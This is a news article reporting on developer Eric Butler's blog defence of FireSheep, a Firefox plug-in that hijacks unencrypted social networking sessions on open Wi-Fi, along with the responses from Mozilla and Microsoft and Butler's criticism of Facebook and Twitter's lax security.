One of a pair of developers who created FireSheep, a Firefox browser plug-in that makes it easy to snoop on others’ social networking sessions, has written a blog post defending his creation, saying it has helped elevate discussion about security on the Web.
In a post on his blog, Eric Butler, a co-author of FireSheep with Ian Gallagher of Security Innovation, responded to charges that his creation was malicious and criticisms that the plug-in for the Mozilla browser opens up session hijacking to even unskilled Web users.
“Like any tool, Firesheep can be used for many things. In addition to raising awareness, it has already proven very useful for people who want to test their own security as well as the security of their (consenting) friends,” Butler wrote.
FireSheep allows Firefox users who are connected to unsecured wireless networks to canvas and then snoop on social networking sessions, including Facebook, iGoogle and Flickr. The program was unveiled at the ToorCon Security Conference in San Diego in October.
Rather than questioning the legal right of FireSheep to exist, people should question the motives and behavior of those who use it to illegally access others accounts, he wrote.
The program was created to raise awareness about the insecurity of social networking Web sites, many of which do not require – or even offer – an encrypted channel for interacting with their Web based applications. Pure HTTP sessions can easily be captured and monitored on unencrypted wireless LANs. Security experts have long warned about man in the middle or session hijacking attacks that take advantage of that gaping security hole, and tools – such as Wireshark – have long enabled technical users to do what FireSheep does.
The difference, of course, is that FireSheep allows Web surfers to hijack these sessions without requiring any technical expertise. The Mozilla Foundation, which makes the Firefox browser, declined to block the plug-in, noting that it merely points to a weakness in social networking sites, but does not exploit a vulnerability in Firefox or other browsers. However, Microsoft added a signature to detect the tool to its anti malware engine, dubbing FireSheep a hacking tool – a move that Butler likens to censorship for users who would like to try his creation.
In all, Butler, who describes himself as a freelance Web application developer living in Seattle, said that the brouhaha should not be about FireSheep, but about the lax security that large corporations continue to tolerate for applications and services they offer online.
“Big companies, especially Facebook and Twitter cannot claim they are unaware of these issues. They have knowingly placed user privacy on the back burner, and I’d be interested to hear some discussion about the ethics of these decisions, which have left users at risk since long before Firesheep.”
And the discussion goes on!